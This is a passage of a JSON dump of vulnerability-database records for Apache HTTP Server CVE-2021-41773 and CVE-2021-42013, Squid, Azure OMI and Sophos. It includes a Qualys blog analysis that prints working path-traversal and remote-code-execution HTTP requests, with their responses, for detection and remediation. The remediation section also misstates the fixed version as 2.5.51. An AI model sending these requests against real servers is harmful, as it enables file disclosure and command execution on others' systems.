"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-03-19T02:05:50", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "debiancve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T09:15:00", "id": "DEBIANCVE:CVE-2021-41773", "href": "https://security-tracker.debian.org/tracker/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-19T02:05:50", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "debiancve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:15:00", "id": "DEBIANCVE:CVE-2021-42013", "href": "https://security-tracker.debian.org/tracker/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-17T15:21:18", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. 
The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:15:00", "type": "debiancve", "title": "CVE-2021-31807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2021-06-08T20:15:00", "id": "DEBIANCVE:CVE-2021-31807", "href": "https://security-tracker.debian.org/tracker/CVE-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-12-17T15:21:18", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. 
Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-27T13:15:00", "type": "debiancve", "title": "CVE-2021-31806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-05-27T13:15:00", "id": "DEBIANCVE:CVE-2021-31806", "href": "https://security-tracker.debian.org/tracker/CVE-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "qualysblog": [{"lastseen": "2021-11-26T18:36:54", "description": "On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted \u201cthe issue is known to be exploited in the wild\u201d and later it was identified that the vulnerability can be abused to perform remote code execution. 
To exploit either vulnerability, the Apache HTTP server must be running in a non-default configuration.\n\nAs the vulnerabilities are configuration dependent, checking the version of the Apache web server is not enough to identify vulnerable servers. With both CVEs being actively exploited, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150372, 150373, 150374**, which send specially crafted HTTP requests to the target server to determine whether it is exploitable. Once a server is detected as vulnerable, users can remediate the vulnerabilities by upgrading to Apache HTTP Server 2.4.51 or greater.\n\n### About CVE-2021-41773\n\nAccording to **CVE-2021-41773**, Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code Execution attacks.\n\n#### Path Traversal Analysis\n\nThe path traversal vulnerability was introduced by a new code change for path normalization, i.e., code that removes unwanted or dangerous parts from the URL path, but this code was inadequate to detect different ways of encoding the path traversal characters \"dot-dot-slash (../)\".\n\nTo prevent path traversal attacks, the normalization function responsible for resolving URL-encoded values in the requested URI resolved those encoded values one at a time. 
Hence, when the second dot is URL-encoded as `%2e`, the logic fails to recognize `%2e` as a dot and does not decode it; this turns the characters `../` into `.%2e/` and bypasses the check.\n\nAlong with the path traversal check bypass, for an Apache HTTP server to be vulnerable, the HTTP Server configuration must either contain the [directory directive](<https://httpd.apache.org/docs/2.4/mod/core.html#directory>) for the entire server\u2019s filesystem set to `Require all granted`, or the directory directive must be missing from the configuration file altogether.\n\n##### Vulnerable Configuration:\n \n \n <Directory />\n Require all granted\n </Directory>\n \n\nTherefore, bypassing the dot-dot check with `.%2e` and chaining it with the misconfigured directory directive allows an attacker to read arbitrary files such as `passwd` from the vulnerable server's file system.\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 08:13:02 GMT\n Server: Apache/2.4.49 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\nPlease note that the default configuration of the Apache HTTP server has the entire filesystem directory directive configured as `Require all denied` and hence is not vulnerable.\n\n#### Remote Code Execution Analysis\n\nWhile **CVE-2021-41773** was initially documented as a path traversal and file disclosure vulnerability, additional research concluded that it can be further exploited to achieve remote code execution when the [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) module is enabled on the Apache HTTP server: the path traversal then lets an attacker call any binary on the system using HTTP POST requests.\n\n##### Configuration to enable mod_cgi module:\n \n \n <IfModule !mpm_prefork_module>\n LoadModule cgid_module modules/mod_cgid.so\n </IfModule>\n \n\nBy default the `mod_cgi` module is disabled on the Apache HTTP server, because the above line is commented out in the configuration file. Hence, when mod_cgi is enabled and the \u201cRequire all granted\u201d config is applied to the filesystem directory directive, an attacker can remotely execute commands on the Apache server. 
\n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: */*\n Content-Length: 7\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 09:58:23 GMT\n Server: Apache/2.4.49 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\nLooking at the HTTP POST request for RCE, we can see that `/bin/sh` is the system binary that executes the payload `echo;id` and prints the output of the `id` command in the response.\n\n### About CVE-2021-42013\n\n**CVE-2021-42013** exists because the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient: it did not cover double URL encoding. The vulnerable configurations therefore remained the same, but the payload used against 2.4.49 was double URL encoded to carry out the same path traversal and remote code execution attack against 2.4.50.\n\nThe attack in 2.4.49 initially encoded the second dot (.) 
to `%2e` and the same was double URL encoded into `%%32%65` for version 2.4.50\n\n##### **Encoding Analysis**\n\nConversion: dot \u2192 `%2e` \u2192 `%%32%65`\n\n * 2 is encoded to %32\n * e is encoded to %65\n * And original `%` left as it is\n\nThus a `dot` is equivalent to `%%32%65` which eventually converts `../` in double URL encode format as `%%32%65%%32%65/`\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:16:51 GMT\n Server: Apache/2.4.50 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 7\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:42:40 GMT\n Server: Apache/2.4.50 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\n### Detecting the Vulnerabilities with Qualys WAS\n\nCustomers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:\n\n * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)\n * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)\n * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)\n\n\nQID 150372 \u2013 Apache HTTP Server Path Traversal (CVE-2021-41773)\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users will see results similar to the following for QID 150372 in the vulnerability scan report:\n\n\n\n### Solution\n\nOrganizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.5.51 or a later version to remediate CVE-2021-41773 & CVE-2021-42013; more information is available in the [Apache Security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nTo maintain best security practices, Qualys also advises users to ensure the following:\n\n * the `mod_cgi` module remains disabled (its default) unless the business requires it.\n 
* the root filesystem `<Directory />` block denies access with `Require all denied`, as shown below (this is httpd's shipped default; the traversal only reaches files outside the aliased directories where that protection has been relaxed):\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\n### Credits\n\n**Apache Security advisory:**\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n**CVE Details:**\n\n<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \n<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>\n\n**Credits for the vulnerability discovery go to:**\n\n * Ash Daulton along with the cPanel Security Team\n * Juan Escobar from Dreamlab Technologies\n * Fernando Mu\u00f1oz from NULL Life CTF Team\n * Shungo Kumasaka and Nattapon Jongcharoen\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1445376079548624899>\n * <https://twitter.com/hackerfantastic/status/1445529822071967745>\n * <https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>\n\n### Contributor\n\n**Jyoti Raval**, Lead Web Application Security Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T06:22:22", "type": "qualysblog", "title": "Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T06:22:22", "id": "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-28T01:50:15", "description": "## Summary\n\nIBM Rational Build Forge version 8.0.x is affected by CVE-2021-42013\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>) \n** DESCRIPTION: **Apache HTTP Server could allow a remote attacker to execute arbitrary code on the system caused by a path traversal vulnerability related to an incomplete fix for CVE-2021-41773 when mod_cgi is enabled. By uploading a file and setting permissions, an attacker could exploit this vulnerability to execute arbitrary code on the system with Apache user privileges. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/210764](<https://exchange.xforce.ibmcloud.com/vulnerabilities/210764>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nBuild Forge| 8.0 - 8.0.0.20 \n \n\n\n## Remediation/Fixes\n\nYou must download the fix pack specified in the following table and apply it. 
\n\n**Affected Supporting Product(s)**\n\n| \n\n**Remediation/Fix** \n \n---|--- \n \nIBM Rational Build Forge 8.0 to 8.0.0.20\n\n| \n\n[Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.21&source=SAR> \"Download\" ) IBM Rational Build Forge 8.0.0.21.\n\nThe fix includes Apache-HTTP-Server-2.4.52 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-17T18:38:24", "type": "ibm", "title": "Security Bulletin: IBM Rational Build Forge 8.0.x is affected by Apache HTTP Server version used in it. 
(CVE-2021-42013)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-17T18:38:24", "id": "B0C070EA4747AEFBB7DD852AD2FEB1C85461D6FC3CC95192FD2B7703C8D3DCB2", "href": "https://www.ibm.com/support/pages/node/6541330", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:53:26", "description": "## Summary\n\nIBM QRadar Azure marketplace images include the Open Management Infrastructure RPM which is vulnerable to CVE-2021-38647. Although we do not expose the affected port, we suggest updating out of an abundance of caution.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-38647](<https://vulners.com/cve/CVE-2021-38647>) \n** DESCRIPTION: **Microsoft Azure Open Management Infrastructure could allow a remote attacker to execute arbitrary code on the system. By executing a specially-crafted program, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208548](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208548>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM QRadar Azure marketplace images 7.3.0 to 7.3.3 Patch 9\n\nIBM QRadar Azure marketplace images 7.4.0 to 7.4.3 Patch 2\n\n \n\n\n## Remediation/Fixes\n \n \n 1. 
Check your current version of OMI to see if you are affected. All versions of OMI below v1.6.8-1 are affected\n To do this perform the following command:\n yum list all | grep omi\n \n 2. Add Microsoft Software Repository for RHEL 7 Linux Platform:\n sudo yum localinstall <https://packages.microsoft.com/config/rhel/7/packages-microsoft-prod.rpm>\n \n 3. Run yum update command for OMI:\n sudo yum update omi\n \n 4. Disable Microsoft Software Repository after updating the rpm \n sudo sed -i 's/^enabled=1/enabled=0/' /etc/yum.repos.d/microsoft-prod.repo \n \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-30T15:02:10", "type": "ibm", "title": "Security Bulletin: IBM QRadar Azure marketplace images include Open Management Infrastructure RPM, which is vulnerable to Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-30T15:02:10", "id": "1E405D4974F6EA8AB73C7DDA9E9B3B2FCA2359AF05B6CF7C124046402F2BC520", "href": "https://www.ibm.com/support/pages/node/6491159", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-41773", "href": "", "cvss": {"score": 4.3, 
"vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Sophos SG UTM Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2020-25223", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Azure Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 